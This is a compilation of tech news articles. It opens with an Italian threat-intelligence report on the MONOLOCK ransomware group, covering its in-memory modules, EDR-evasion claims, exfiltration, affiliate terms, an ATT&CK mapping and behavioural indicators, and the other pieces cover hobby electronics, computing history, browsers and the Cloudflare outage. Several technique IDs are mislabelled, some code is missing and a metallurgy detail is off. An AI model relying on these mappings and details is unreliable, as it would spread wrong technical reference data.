Il caso più recente è MONOLOCK, un nuovo gruppo ransomware apparso su DarkForums il 19 ottobre 2025 con un manifesto che sembra scritto più da un red team senior che da un cybercriminale tradizionale.

La loro presentazione è insolita, e soprattutto molto più tecnica rispetto alla media dei gruppi emergenti. E i dettagli offerti meritano un’analisi approfondita.

Un gruppo apolitico, tecnico e orientato all’OPSEC

MONOLOCK si definisce un’organizzazione apolitica specializzata nello sviluppo di toolkit per campagne ransomware completamente automatizzate, con una struttura modulare basata su BOF (Beacon Object File) e payload caricati direttamente in memoria.

Fin qui potrebbe sembrare un gruppo come tanti. Ma la svolta arriva quando dichiara quello che non farà:

• Nessun leak site
• Nessun affiliate panel
• Nessuna vetrina pubblica delle vittime
• Nessun hosting di builder o decryptor tramite server dedicati

Il motivo? La loro priorità è l’OPSEC, sia per sé stessi che per gli affiliati. Criticano apertamente i leak site: secondo MONOLOCK, la pubblicazione dei nomi delle vittime riduce la probabilità di pagamento, distrugge la reputazione anche in caso di riscatto e attira troppo l’attenzione delle forze dell’ordine. È una scelta controcorrente — e proprio per questo molto più sofisticata.

Il loro arsenale: moduli BOF e componenti avanzati

MONOLOCK presenta un’intera suite di moduli, tutti realizzati come BOF (Beacon Object File), la tecnologia nativa di Cobalt Strike per eseguire codice direttamente in memoria senza file drop.

• Privilege Escalation: Tecniche senza modificare il registro, senza LOLBins, evitando pattern rilevabili dagli EDR.
• Shadow Copy Wipe: Rimozione delle VSS per impedire qualunque tentativo di recupero locale.
• Anti-Analysis: con controlli avanzati su: debugger, hypervisor, timing anomalies, processi sospetti, delta CPU ciclici. Questi sono dettagli tipici di sviluppatori esperti di malware, non di script kiddie.
• Persistence: scheduled tasks con privilegi SYSTEM e trigger custom.
• MonoSteal Exfiltration Engine: questo è uno dei moduli più importanti che garantisce: esfiltrazione accelerata, compressione live, I/O asincrono, velocità dichiarate fino a 45 MB/s. Un valore altissimo, comparabile — come dicono loro stessi — a StealBit di LockBit. Rimarchevole, considerando che gli esfiltratori RClone-based raramente superano i 5–10 MB/s su link reali.
• MonoLock | Locker: Il ransomware vero e proprio, basato su algoritmo ChaCha20–Salsa20 ibrido con encryption asincrona fino a 276 MB/s dichiarati
• MonoLock | Decrypt: decryptor controllato tramite una chiave privata hex encoded. Questo riduce drasticamente il rischio di “fork” o copie non autorizzate. È un sistema quasi “boutique ransomware”.

Nessun leak site, nessun panel: una strategia chirurgica

Alla domanda: “Avete un TOR site? Avete già vittime?”
Rispondono così:

“Hosting extortion updates adds unnecessary weight.
Vogliamo dare alle aziende la possibilità di recuperare dati e reputazione.”

E soprattutto:

“Un affiliate panel espone builder, decryptor, database affiliati e chiavi. FBI, CERT e ricercatori adorano queste infrastrutture. Non vogliamo offrirgli un bersaglio semplice.”

È una filosofia quasi “da intelligence”.
I loro post mostrano una consapevolezza rara: sanno perché i grandi RaaS sono caduti. E non vogliono fare gli stessi errori.

Reclutamento e IAB: MONOLOCK entra nella fase operativa

MONOLOCK sta cercando:

• affiliati esperti: operatori in grado di muoversi in Active Directory
• inizial access brokers (IAB)
• malware development

E soprattutto: “Non accettiamo script kiddies”. Un messaggio destinato a filtrare affiliati impreparati — strategia usata anche da gruppi come Muliaka e dagli ex Conti Team Two.

Fee iniziale: 500$
Revenue share: 20% fisso

Livello tecnico: molto superiore alla media dei gruppi emergenti

Chi ha sviluppato i moduli BOF ha competenze avanzate:

• conoscenza profonda API di Windows
• red teaming
• uso avanzato di C2
• OPSEC
• design modulare fileless

È probabile che il team provenga da:

• ambienti di pentesting
• gruppi defezionati da altri RaaS
• ex sviluppatori di loader privati
• ecosistemi Cobalt Strike / Sliver

Evasione EDR: la filosofia MONOLOCK

Uno dei passaggi più interessanti — e rari — nella comunicazione di MONOLOCK riguarda il tema dell’evasion EDR.
A differenza di molti gruppi RaaS che millantano “UD totale”, MONOLOCK affronta l’argomento in modo tecnico, quasi professionale, riconoscendo limiti, catena di esecuzione e punti deboli.

Nel loro post dichiarano:

“Our implants beat EDRs, we have tested Windows Defender Endpoint Detection, SentinelOne, Crowdstrike and all of the commercial AVs.”

Un’affermazione forte, ma subito accompagnata da una spiegazione inusuale per trasparenza e precisione tecnica.

Subito dopo, infatti, precisano:

“Since we utilize the BoF implant format, our implant execution is based on the C2 connection, meaning that if the shellcode is detected, there is no pipe through which the implants are being loaded. We offer a shellcode loader […] to mitigate precisely this.”

Questa frase è cruciale.
MONOLOCK sta affermando esplicitamente che:

• il loro stealth non dipende dai moduli BOF, che girano in memoria ed effettivamente sfuggono a molte tecniche EDR
• il vero punto di detection è il loader, ovvero il shellcode che stabilisce la connessione iniziale al C2

E aggiungono:

“Long story short, if the C2 gets a connection, implants will run no matter what.”

In altre parole: se il loader riesce anche solo una volta a passare, il beacon caricherà i BOF e l’intera catena di strumenti diventerà estremamente difficile da rilevare.

Nessuna promessa di undetectable: un approccio insolitamente realistico

Ed è qui che arriva la parte più sorprendente — e per certi versi professionale. Alla domanda su perché non pubblicizzino il loro toolset come “undetectable”, rispondono:

“Why don’t we explicitly mention the ‘UD’ status? We will be straightforward: utilizing UD is a vague expression… it eventually bolds down to each company infrastructure.”

In sintesi:

• Non promettono undetectable totale
• Non spingono marketing ingannevole
• Non usano slogan RaaS tipici (“100% undetectable”)
• Riconoscono che la detection dipende dall’infrastruttura della vittima
• Confermano che la battaglia tecnica è sul loader, non sui BOF

Questo è un livello di autoconsapevolezza molto raro nei gruppi emergenti.

Perché MONOLOCK è estremamente pericoloso

• Attacchi molto più difficili da rilevare: I BOF riducono la superficie rilevabile da EDR/XDR. Dichiarano di poter bypassare: Defender, SentinelOne e CrowdStrike.
• Nessun leak site: le vittime perdono i “segnali esterni”, i ricercatori non hanno visibilità, aumenta l’incertezza e quindi aumentano le probabilità di pagamento.
• Esfiltrazione ultra-veloce: 45 MB/s significa che possono rubare decine di GB in pochi minuti.
• Locker ad alte prestazioni: Sui server moderni ChaCha20/Salsa20 è una scelta perfetta per velocità e stealth.
• OPSec superiore alla media: niente tor, niente panel, niente centralizzazione. Un modello molto più resiliente.

MONOLOCK non è l’ennesimo ransomware “clone”. È un’evoluzione del modello, una forma di ransomware più: silenziosa, professionale, decentralizzata, tecnica.

È l’archetipo del “ransomware boutique”: piccolo team, codice avanzato, visibilità minima, efficienza massima.

Ci aspettiamo che le prime campagne reali emergano presto, probabilmente tramite Initial Access Broker già attivi nel mercato occidentale. E quando inizieranno, non sarà facile accorgersene.

FULL-PACKAGE CTI

([em]Profilo attore[/em], MITRE ATT&CK, TTP previsti, [em]IOC)[/em]

Profilo Attore – MONOLOCK

• Tipo: Ransomware as a Toolkit (RAaT)
• Modello: No leak site, no panel
• Skill: Medio-alte
• Tecnologia: BOF, loader fileless, C2 basati su beacon
• Origine probabile: Europa Est (speculazione basata su linguaggio e pattern)
• Target previsti: aziende con infrastrutture AD, ambienti corporate, PA

MITRE ATT&CK (previsione TTP)

• Inizial Access
  
  • T1078 – Valid Accounts
  • T1190 – Vulnerability Exploitation (tramite IAB)

  
  

• Execution
  
  • T1047 – WMI
  • T1620 – Reflective Code Loading / BOF Execution

  
  

• Privilege Escalation
  
  • T1548 – Abuse of Token
  • T1068 – Exploitation for PrivEsc

  
  

• Persistence
  
  • T1053.005 – Scheduled Task SYSTEM

  
  

• Defense Evasion
  
  • T1027 – Obfuscation
  • T1497 – Sandbox Evasion
  • T1070.006 – Shadow Copy Deletion
  • T1112 – Defense Modification Avoidance

  
  

• Credential Access
  
  • T1003 – LSASS dump (probabile BOF dedicato)

  
  

• Lateral Movement
  
  • T1021 – SMB/RDP
  • T1087 – AD Enumeration

  
  

• Exfiltration
  
  • T1041 – Exfil via C2
  • T1567.002 – Exfil Compressed

  
  

• Impact
  
  • T1490 – Stop Recovery
  • T1486 – Data Encryption

  
  

IOC (comportamentali, non hash)

• Processi anomali
  
  • tasksche.exe → scheduled tasks elevati
  • processi con injection reflective loader
  • thread ad alta velocità in processi standard (es: svchost)

  
  

• Network
  
  • connessioni brevi e intermittenti verso VPS offshore
  • pattern di traffico compressi e frammentati

  
  

• File system
  
  • cancellazione improvvisa VSS
  • attività su path custom della ransom note

  
  

L'articolo MONOLOCK: il nuovo gruppo ransomware “silenzioso” che rifiuta leak site e affiliate panel proviene da Red Hot Cyber.

Since the dawn of computers, we’ve tried different ways to store data. These days, you grab data over the network, but you probably remember using optical disks, floppies, or, more recently, flash drives to load something into your computer. Old computers had to use a variety of methods, such as magnetic tape. But many early computers used some technology that existed from the pre-computer era, like punched cards or, as [Anthony Francis-Jones] shows us, paper tape.

Paper tape was common in TeleType machines and some industrial applications. In fact, as early as 1725, looms could use paper tape, which would eventually lead to punched cards. For computers, there were two common variations that differed in how many holes were punched across the tape: 5 or 8. There was also a small sprocket hole that allowed a gear to move the tape forward through a reader.

Typically, brushes or optical sensors would read the holes into the computer. Some paper tape used regular paper, but others used oily paper. You could also get tapes made out of mylar, which was very durable.

The other big difference in tapes was in how they were punched. A conventional tape had the entire hole punched out, leaving confetti-like “chad.” There were also chadless tapes where the chad was left slightly connected to the paper.

One common feature of paper tape was that it would skip any section where every hole had been punched. This allowed you to erase parts of the tape by punching over it. Then, with scissors and tape, you could splice sections by lining up the fully punched areas between two sections of tape. You could also make endless loops of tape.

Paper tape was used as a crude word processor back in the day. They were even used to send wire photos.

youtube.com/embed/QzRhDXnpn3Q?…

hackaday.com/2025/11/20/a-pape…

On November 18 of 2025 a large part of the Internet suddenly cried out and went silent, as Cloudflare’s infrastructure suffered the software equivalent of a cardiac arrest. After much panicked debugging and troubleshooting, engineers were able to coax things back to life again, setting the stage for the subsequent investigation. The results of said investigation show how a mangled input file caused an exception to be thrown in the Rust-based FL2 proxy which went uncaught, throwing up an HTTP 5xx error and thus for the proxy to stop proxying customer traffic. Customers who were on the old FL proxy did not see this error.

The input file in question was the features file that is generated dynamically depending on the customer’s settings related to e.g. bot traffic. A change here resulted in said feature file to contain duplicate rows, increasing the number of typical features from about 60 to over 200, which is a problem since the proxy pre-allocates memory to contain this feature data.

While in the FL proxy code this situation was apparently cleanly detected and handled, the new FL2 code happily chained the processing functions and ingested an error value that caused the exception. This cascaded unimpeded upwards until panic set in: thread fl2_worker_thread panicked: called Result::unwrap() on an Err value

The Rust code in question was the following:

The obvious problem here is that an error condition did not get handled, which is one of the most basic kind of errors. The other basic mistake seems to be that of input validation, as apparently the oversized feature file doesn’t cause an issue until it’s attempted to stuff it into the pre-allocated memory section.

As we have pointed out in the past, the biggest cause of CVEs and similar is input validation and error handling. Just because you’re writing in a shiny new language that never misses an opportunity to crow about how memory safe it is, doesn’t mean that you can skip due diligence on input validation, checking every return value and writing exception handlers for even the most unlikely of situations.

We hope that Cloudflare has rolled everyone back to the clearly bulletproof FL proxy and is having a deep rethink about doing a rewrite of code that clearly wasn’t broken.

hackaday.com/2025/11/20/how-on…

If you’ve ever used an NE602 or similar IC to build a radio, you might have noticed that the datasheet has a “gilbert cell” mixer. What is that? [Electronics for the Inquisitive Experimenter] explains them in a recent video. The gilbert cell is a multiplier, and multiplying two waveforms will work to mix them together.

At the heart of the gilbert cell is essentially three differential amplifiers that share a common current source. The video shows LTSpice simulations of the circuits as he explains them.

One reason these work well on ICs is that they require very closely-matched transistors. In real life, it is hard to get transistors that match exactly. But when they are all on the same slab of silicon, it is fairly straightforward.

What we really like is that after simulating and explaining the circuit, he explains why multipliers mix signals, then builds a real circuit on the bench using discrete transistors and matched transistor arrays. There is a bit of trigonometry in the explanation, but nothing too difficult.

Of course, the most common application of differential amplifiers is the op amp. The NE602 is out of production, sadly, but if you can find any, they make dandy receivers.

youtube.com/embed/mQ36yy7mloA?…

hackaday.com/2025/11/20/gilber…

UBTECH Robotics, società con base a Shenzhen, ha mostrato pubblicamente la sua nuova ondata di robot umanoidi, consegnandone alcune centinaia in un’unica operazione.

L’annuncio è stato accompagnato da un video che ha rapidamente attirato l’attenzione dei social. Le riprese, realizzate all’interno di un grande magazzino completamente bianco, immortalano lunghi schieramenti di robot impegnati in movimenti sincronizzati: estraggono e reinseriscono la batteria posta sulla schiena, si siedono insieme e poi avanzano in fila verso i camion incaricati del trasporto.

Secondo l’azienda, si tratta della prima consegna su larga scala della seconda generazione dei propri modelli umanoidi, un passaggio considerato strategico per la produzione industriale. La clip si chiude con la parola “Forward”, quasi un motto che accompagna il debutto operativo dei nuovi robot.

La diffusione del filmato ha generato reazioni di segno opposto: c’è chi lo ha accolto con meraviglia e chi, invece, ha espresso una certa inquietudine. Alcuni utenti hanno persino messo in dubbio l’autenticità dell’opera, ipotizzando che potesse trattarsi di una sequenza creata digitalmente, complice l’atmosfera che ricorda le scenografie dei film di fantascienza.

I robot umanoidi sono pensati per imitare postura, movimento e operatività degli esseri umani, così da poter lavorare in ambienti condivisi. Il loro percorso parte da lontano: nel 1973 l’Università di Waseda, in Giappone, presentò Wabot-1, considerato il primo umanoide completo mai costruito. Da allora, la ricerca non si è fermata e oggi la Cina è fra i Paesi che spingono maggiormente sulla robotica avanzata.

Accanto all’interesse tecnologico, riaffiorano però timori legati al futuro del lavoro. La possibilità che macchine di questo tipo possano sostituire ruoli ripetitivi o faticosi alimenta dubbi sulle ricadute economiche per chi occupa mansioni meno qualificate, che rischiano di essere le più esposte alla competizione con robot sempre attivi e privi di costi salariali.

L’iniziativa di UBTECH si inserisce inoltre nel già teso confronto tecnologico tra Cina e Stati Uniti. La rapida crescita del settore robotico cinese viene seguita con attenzione da Washington, che da anni contende a Pechino la leadership in campi come semiconduttori, intelligenza artificiale e automazione. Resta ora da capire quale sarà la risposta statunitense di fronte a un passo avanti considerato rilevante in un settore strategico per entrambe le potenze.

L'articolo Centinaia di robot in marcia: la Cina presenta la nuova generazione umanoide proviene da Red Hot Cyber.

Once upon a time, owning a calculator watch was the epitome of cool. Well, for a very specific subset of the population with our own definition of “cool” anyway. The only thing cooler than wearing a calculator watch? Making a calculator watch, of course! If you do it as part of developing your own SDK for a popular RISC V microcontroller, all the better. That’s what [Miroslav Nemecek] did with his Antcalc watch, which is one of the demo projects for the CH32Lib SDK, which is currently under development at version 0.35 as this is written.
It appears as though the solid core wire on the back of the homemade PCB is used to hold the watch band, a nice little hack.
As you might guess, CH32LibSDK is targeting the super-cheap CH32 series of RISC V microcontrollers. Perhaps because the SDK is so early in development, there’s not much documentation outside of the example projects. The examples are all worth looking at, but our tipster wanted us to cover the Antcalc calculator watch specifically.

The Antcalc watch uses the SOP16-packaged CH32V002A4M6 to drive a small OLED display while taking input in Reverse Polish Notation from a dozen small buttons. We’re not sure how the cool kids feel about RPN these days, but that’s got to be worth extra nerd cred. Using a RISC V chip doesn’t hurt in that department, either.

For something so small– 30 mm x 55 mm–it’s looks like a decent little calculator, with 10 registers holding a mantissa of 21 digits and exponents up-to +/-99 in binary coded decimal. Seven layers on the dozen-key input pad mean most of the scientific functions you could ask for are available, along with the ability to record and replay upto 10 macros. There are also ten memory slots, all of which go into the chip’s onboard flash so are non-volatile during a battery swap. (Of which many will be necessary, since this appears to run on a single coin cell.)

If you get bored of wrist-mounted calculating, you could always repurpose this microcontroller to play MOD files on your wrist. Some people couldn’t imagine ever getting bored by a wrist-mounted calculator, and just for them we have this teardown of a beautiful 1975 model and a this article on the history of the calculator watch.

Thanks to [James Bowman] for the tip.

hackaday.com/2025/11/20/wear-t…

When you’re like [Wes] from Watch Wes Work fame, you don’t have a CNC machine hoarding issue, you just have a healthy interest in going down CNC machine repair rabbit holes. Such too was the case with a recently acquired 2001 Milltronics ML15 lathe, that at first glance appeared to be in pristine condition. Yet despite – or because of – living a cushy life at a college’s workshop, it had a number of serious issues, with a busted Z-axis drive board being the first to be tackled.
The Glentek servo board that caused so much grief. (Credit: Watch Wes Work, YouTube)
The identical servo control board next to it worked fine, so it had to be an issue on the board itself. A quick test showed that the H-bridge IGBTs had suffered the typical fate that IGBTs suffer, violently taking out another IC along with them. Enjoyably, this board by one Glentek Inc. did the rebranding thing of components like said IGBTs, which made tracking down suitable replacements an utter pain that was eased only by the desperate communications on forums which provided some clues. Of course, desoldering and testing one of the good IGBTs on the second board showed the exact type of IGBT to get.

After replacing said IGBTs, as well as an optocoupler and other bits and pieces, the servo board was good as new. Next, the CNC lathe also had a busted optical encoder, an unusable tool post and a number of other smaller and larger issues that required addressing. Along the way the term ‘pin-to-pin compatible’ for a replacement driver IC was also found to mean that you still have to read the full datasheet.

Of the whole ordeal, the Glentek servo board definitely caused the most trouble, with the manufacturer providing incomplete schematics, rebranding parts to make generic replacements very hard to find and overall just going for a design that’s interesting but hard to diagnose and fix. To help out anyone else who got cursed with a Glentek servo board like this, [Wes] has made the board files and related info available in a GitHub repository.

youtube.com/embed/BuQZeiAugp4?…

hackaday.com/2025/11/20/fixing…

It’s likely that Hackaday readers have among them a greater than average number of people who can name one special thing they did on September 23rd, 2002. On that day a new web browser was released, Phoenix version 0.1, and it was a lightweight browser-only derivative of the hugely bloated Mozilla suite. Renamed a few times to become Firefox, it rose to challenge the once-mighty Microsoft Internet Explorer, only to in turn be overtaken by Google’s Chrome.

Now in 2025 it’s a minority browser with an estimated market share just over 2%, and it’s safe to say that Mozilla’s take on AI and the use of advertising data has put them at odds with many of us who’ve kept the faith since that September day 23 years ago. Over the last few months I’ve been actively chasing alternatives, and it’s with sadness that in November 2025, I can finally say I’m Firefox-free.

Just What Went Wrong?

Browser market share, 2009 to 2025. Statcounter, CC BY-SA 3.0.
It was perhaps inevitable that Firefox would lose market share when faced with a challenger from a player with the economic muscle of Google. Chrome is everywhere, it’s the default browser in Android and ChromeOS, and when stacked up against the Internet Explorer of fifteen years or so ago it’s not difficult to see why it made for an easy switch. Chrome is good, it’s fast and responsive, it’s friendly, and the majority of end users either don’t care or don’t know enough to care that it’s Google’s way in to your data. When it first appeared, they still had the “Don’t be evil” aura to them, even if perhaps behind the warm and fuzzy feeling it had already worn away in the company itself.

If Firefox were destined to become a minority player then it could still be a successful one; after all, 2% of the global browser market still represents a huge number of users whose referrals to search engines return a decent income. But the key to being a success in any business is to know your customers, and sitting in front of this particular screen it’s difficult to escape the conclusion that Mozilla have lost touch with theirs. To understand this it’s necessary for all of us to look in the mirror and think for a moment about who uses Firefox.

Somewhere, A Group Of Users Are Being Ignored

Blink, and its name will change: Phoenix version 0.1. Mozilla Foundation; Microsoft, Inc., CC BY-SA 4.0.
A quick straw poll in my hackerspace revealed a majority of Firefox users, while the same straw poll among another group of my non-hackerspace friends revealed none. The former used Firefox because of open-source vibes, while the latter used Edge or Safari because it came with their computer, or Chrome on their phone and on their desktop because of Google services. Hackaday is not a global polling organisation, but we think it’s likely that the same trend would reveal itself more widely. If you’re in the technology space you might use Firefox, but if you aren’t you may not even have heard of it in 2025. It’s difficult to see that changing any time soon, to imagine some killer feature that would make those Chrome, Safari, and Edge users care enough to switch to Firefox.

To service and retain this loyal userbase then, you might imagine that Mozilla would address their needs and concerns with what made Phoenix a great first version back in 2002. A lightweight and versatile standards-compliant and open-source web browser with acceptable privacy standards, and without any other non-browser features attached to it. Just a browser, only a browser, and above all, a fast browser.

Instead, Mozilla appear to be following a course calculated to alarm rather than retain these users. Making themselves an AI-focused organisation, neglecting their once-unbeatable developer network, and trying to sneak data gathering into their products. They appear now to think of themselves as a fad-driven Valley startup rather than the custodians of a valuable open-source package, and unsurprisingly this is concerning to those of us who know something about what a browser does behind the scenes.

Why Is This Important?

If you have ever had to write code like this, you will know. Bret Taylor, CC-BY 2.5.
It is likely that I am preaching to the choir here, but it’s important that there be a plurality of browsers in the world. And by that I mean not just a plurality of front-ends, but a plurality of browser engines. One of the reasons Phoenix appeared all those years ago was to challenge the dominance of Microsoft Internet Explorer, the tool by which the Redmond software company were trying to shape the online world to their tune. If you remember the browser wars of that era, you’ll have tales of incompatibilities seemingly baked in on purpose to break the chances of an open Web, and we were all poorer for it. Writing Javascript with a range of sections to deal with the quirks of different browser families is now largely a thing of the past, and for that you have the people who stuck with Firefox in the 2000s to thank.

The fear is that here in 2025 we are in an analogous situation to the early 2000s, with Google replacing Microsoft. Such is the dominance of Google Chrome and the WebKit-derived Blink engine which powers it, that in effect, Google have immense power to shape the Web just as Microsoft did back in the day. Do you trust them to live up to their now-retired mission statement and not be evil? We can’t say we do. Thus Firefox’s Gecko browser engine is of crucial importance, representing as it does the only any-way serious challenger to Blink and WebKit’s near-monopoly. That it is now tied to a Mozilla leadership treating it in so cavalier a manner does not bode well for the future of the Web.

So I’ve set out my stand here, that after twenty-three years, I’m ready to abandon Firefox. It’s not a decision that has been easy, because it’s important for all of us that there be a plurality of browsers, but such is the direction being taken by Mozilla that I am not anxious to sit idly by and constantly keep an eye out for new hidden privacy and AI features to turn off with obscure checkboxes. In the following piece I’ll take a look at my hunt for alternatives, and you may be surprised by the one I eventually picked.

hackaday.com/2025/11/20/so-lon…

[Zack], in addition to being a snappy dresser, has a thing for strange 3D printing filament. How strange? Well, in a recent video, he looks at filaments that require 445 C. Even the build plate has to be super hot. He also looks at filament that seems like iron, one that makes you think it is rubber, and a bunch of others.

As you might expect, he’s not using a conventional 3D printer. Although you might be able to get your more conventional printer to handle some of these, especially with some hacking. There is filament with carbon fiber, glass fiber, and more exotic add-ons.

Most of the filaments need special code to get everything working. While you might think you can’t print these engineering filaments, it stands to reason that hobby-grade printers are going to get better over time (as they already have). If the day is coming when folks will be able to print any of these on their out-of-the-box printer, we might as well start researching them now.

If you fancy a drinking game, have a shot every time he changes shots and a double when the Hackaday Prize T-shirt shows up.

youtube.com/embed/J8PZWkjt65Q?…

hackaday.com/2025/11/20/rare-f…

Esattamente 40 anni fa, il 20 novembre 1985, Microsoft rilasciò Windows 1.0, la prima versione di Windows, che tentò di trasformare l’allora personal computer da una macchina con una monotona riga di comando in un sistema con finestre, icone e controllo tramite mouse.

Si tratta della messa a terra di alcune delle più grandi innovazioni del nostro tempo, ideata dal genio di Duglas Engelbart e dell’“oN-Line System”, il sistema progettato negli anni sessanta che introduceva un sistema operativo a finestre connesso ad un mouse, presentati nella storica “mother of all demos” del 9 dicembre del 1968.
Schermata di caricamento di Windows 1.0
Per il pubblico di oggi, questo sembra scontato (o sconosciuto) ma a metà degli anni ’80, l’idea stessa di un’interfaccia grafica sul PC IBM di massa era praticamente rivoluzionaria.

Tecnicamente, Windows 1.0 non era un sistema operativo completo. Era una sovrapposizione grafica su MS-DOS , una shell a 16 bit chiamata MS-DOS Executive che si sovrapponeva al sistema esistente e consentiva l’esecuzione di programmi in modalità finestra.

La prima versione fu rilasciata solo negli Stati Uniti; aggiornamenti ed edizioni internazionali seguirono in seguito, e il pacchetto costava circa 99 dollari, una cifra considerevole all’epoca.
Desktop di Windows 1.0, dove si possono vedere le finestre non modificabili nella loro dimensione
L’interfaccia appariva insolita persino per gli standard degli anni ’80. In Windows 1.0, le finestre non potevano essere sovrapposte liberamente: erano rigorosamente affiancate sullo schermo. L’utente controllava il sistema principalmente con il mouse, selezionando le voci di menu e trascinando gli elementi, sebbene i menu stessi funzionassero in modo strano e richiedessero di tenere premuto il pulsante del mouse.

Ma anche allora, Microsoft stava già definendo i principi che in seguito si sarebbero evoluti nel modello desktop che conosciamo.

Windows 1.0 includeva una suite di applicazioni sorprendentemente riconoscibili ancora oggi. Agli utenti venivano offerti Paintbrush, l’antenato dell’odierno Paint, Blocco note, l’editor di testo Write, Calcolatrice, un orologio, un terminale, il database di schede Cardfile, gli appunti e un gestore di stampa. Queste applicazioni consentivano agli utenti di prendere semplici appunti, disegnare semplici grafici, stampare documenti ed eseguire più programmi contemporaneamente, sebbene con un multitasking molto limitato.

I requisiti hardware al momento del rilascio erano considerati piuttosto elevati. Per eseguire Windows 1.0 era necessario un processore Intel 8086 o 8088, almeno 256 kilobyte di RAM, una scheda grafica e due unità floppy disk a doppia faccia o un disco rigido. Molti recensori si sono lamentati del notevole rallentamento del sistema durante l’esecuzione di più applicazioni, soprattutto se il computer disponeva di una memoria inferiore ai 512 kilobyte consigliati. In confronto, l’attuale minimo di 4 gigabyte per Windows 11 sembra quasi un balzo in avanti.

Windows 1.0 ricevette un’accoglienza tiepida dal mercato. I critici ne notarono l’interfaccia lenta, la scarsa compatibilità con i programmi DOS esistenti e il numero limitato di applicazioni scritte specificamente per Windows. Rispetto ai sistemi grafici Apple già disponibili, il prodotto Microsoft appariva rudimentale e alcuni recensori paragonarono le sue prestazioni su un PC con 512 kilobyte di RAM a “melassa versata nell’Artico”, alludendo alla sua incredibile lentezza.
Desktop di Windows 2.0
Tuttavia, Microsoft non abbandonò l’idea. Nel giro di un paio d’anni, l’azienda rilasciò diversi aggiornamenti di Windows 1.x con supporto per nuovo hardware e layout di tastiera europei, per poi introdurre Windows 2.0 e il particolarmente riuscito Windows 3.0.

Queste versioni, da sole, resero l’interfaccia grafica dei PC IBM uno standard di fatto del settore e gettarono le basi per il vasto ecosistema software a cui ci siamo abituati negli anni ’90.
Desktop di Windows 3.0
Oggi, Windows 1.0 è ormai da tempo diventato un reperto da museo: emulatori del sistema vengono lanciati per nostalgia e curiosità, e la stessa Microsoft occasionalmente ricorda la sua prima interfaccia grafica attraverso Easter egg e progetti a tema, come la divertente app per Windows 1.11 basata sulla serie TV Stranger Things.

Ma molte idee e persino alcuni programmi di quell’epoca sono sopravvissuti fino a oggi, e il 40° anniversario ci ricorda quanto rapidamente siano cambiati sia i computer che la nostra comprensione di cosa dovrebbe essere un’interfaccia intuitiva in una sola generazione .

L'articolo Tanti auguri Windows! 40 anni di storia dei sistemi operativi e non sentirli proviene da Red Hot Cyber.

If you take a look around you, chances are pretty good that within a few seconds, your eyes will fall on some kind of electrical connector. In this day and age, it’s as likely as not to be a USB connector, given their ubiquity as the charger of choice for everything from phones to flashlights. But there are plenty of other connectors, from mains outlets in the wall to Ethernet connectors, and if you’re anything like us, you’ve got a bench full of DuPonts, banana plugs, BNCs, SMAs, and all the rest of the alphabet soup of connectors.

Given their propensity for failure and their general reputation as a necessary evil in electrical designs, it may seem controversial to say that all connectors are engineered to last. But it’s true; they’re engineered to last, but only for as long as necessary. Some are built for only a few cycles of mating, while others are built for the long haul. Either way, connectors are a great case study in engineering compromise, one that loops physics, chemistry, and materials science into the process.

A Tale of Two Connectors

While there’s a bewildering number of connectors available today, most have at least a few things in common. Generally, connectors consist of one or more electrically conductive elements held in position by an insulating body of some sort, one that can mechanically attach to another body containing more conductive elements. When the two connectors are attached, the conductive elements come into physical contact with each other, completing the circuit and providing a low-resistance path for current to flow. The bodies also have to be able to separate from each other when the connections need to be broken.
This Molex connector is only engineered for a few mating cycles over its useful life. By Barcex – Self-published work, CC BY-SA 2.5.
For as simple as that sounds, a lot of engineering goes into making connectors that are suitable for the job at hand. The intended use of a connector dictates a lot about how it’s designed, and in terms of connector durability, looking at the extremes can be instructive. On one end of the scale, we might have something like a Molex connector on a wiring harness in a dishwasher. Under ideal circumstances, a connector like that only needs to be used once, in the factory during assembly. If the future owner of the appliance is unlucky, that connector might go through one or two more mating cycles if the machine needs to be serviced at some point. Either way, the connector is only going to be subjected to low single-digit mating cycles, and should be designed accordingly
A USB-C connector, on the other hand, is designed for 10,000 mating cycles. By Tomato86 – Own work, CC BY-SA 4.0.
On the other end of the mating-cycle spectrum would be something like the USB-C connector on a cell phone. Assuming the user will charge the phone once a day, the connector might have to endure many thousands of mating cycles over the useful life of the phone. Such a connector has a completely different use case from a connector like that Molex, and very different design constraints. But the basic job — bringing two conductors into close contact to complete a low-resistance circuit, and allow the circuits to be broken only under the right circumstances — is the same for both.

But what exactly do we mean by “close contact”? It might seem obvious — conductors in each half of the connector have to touch each other. But keeping those conductors in contact is the real trick, especially in challenging environments such as under the hood of a car or inside a CNC machine, where vibration, dust, and liquid intrusion can all come together to force those contacts apart and break the circuit while it’s still in use.

esseeWhy Be Normal?

To keep contacts together, engineers rely on one of the simplest mechanisms of all: springs. In most connectors, the contacts themselves are the sprung elements, although there are connectors where force is applied to the contacts with separate springs. In either case, the force generated by the spring pushes the contacts together firmly enough to ensure that they stay connected. This is the normal force, called so because the force is exerted perpendicular to the plane of contact when the connector is mated.

Traditionally, normal force in connector engineering is expressed in grams, which seems like an affront to the SI system, where force is expressed in Newtons. But fear not — “grams” does not refer to the mass of a contact, but rather is shorthand for “gram-force,” the force applied by one gram of mass in a one g gravitational field. So, an “80 gram” contact is really exerting 0.784 N of normal force. But that’s a bit clunky, especially when most connectors have normal forces that are a fraction of a Newton. So it ends up being easier to refer to the grams part of the equation and just assume the acceleration component.

The amount of normal force exerted by the contacts is a critical factor in connector design, and has to be properly scaled for the job. If the force is too low, it may increase the resistance of the circuit or even result in intermittent open circuits. If the force is too high, the connector could be difficult to mate and unmate, or the contacts could wear out from excess friction.

Since the contacts themselves are usually the springs as well as the conductors, getting the normal force right, as well as ensuring the contacts are highly conductive, is largely an exercise in materials science. While pure copper is an excellent conductor, it is not elastic enough to provide the proper normal force. So, most connectors use one of two related copper alloys for their contacts: phosphor bronze, or beryllium copper. Both are excellent electrical and thermal conductors, and both are strong and springy, but there are significant differences between the two that make them suitable for different types of connectors.

As the name implies, phosphor bronze is an alloy of phosphorus and bronze, which itself is an alloy of copper and tin. To make phosphor bronze, about 0.03% phosphorus is added to pure molten copper. Any oxygen dissolved in the copper reacts with the phosphorus, making phosphorus pentoxide (P₂O₅), which can be easily removed during refining. About 2% tin is added along with about 10% zinc and 2% iron to make the final alloy, which is easily cast into sheets or coil stock.

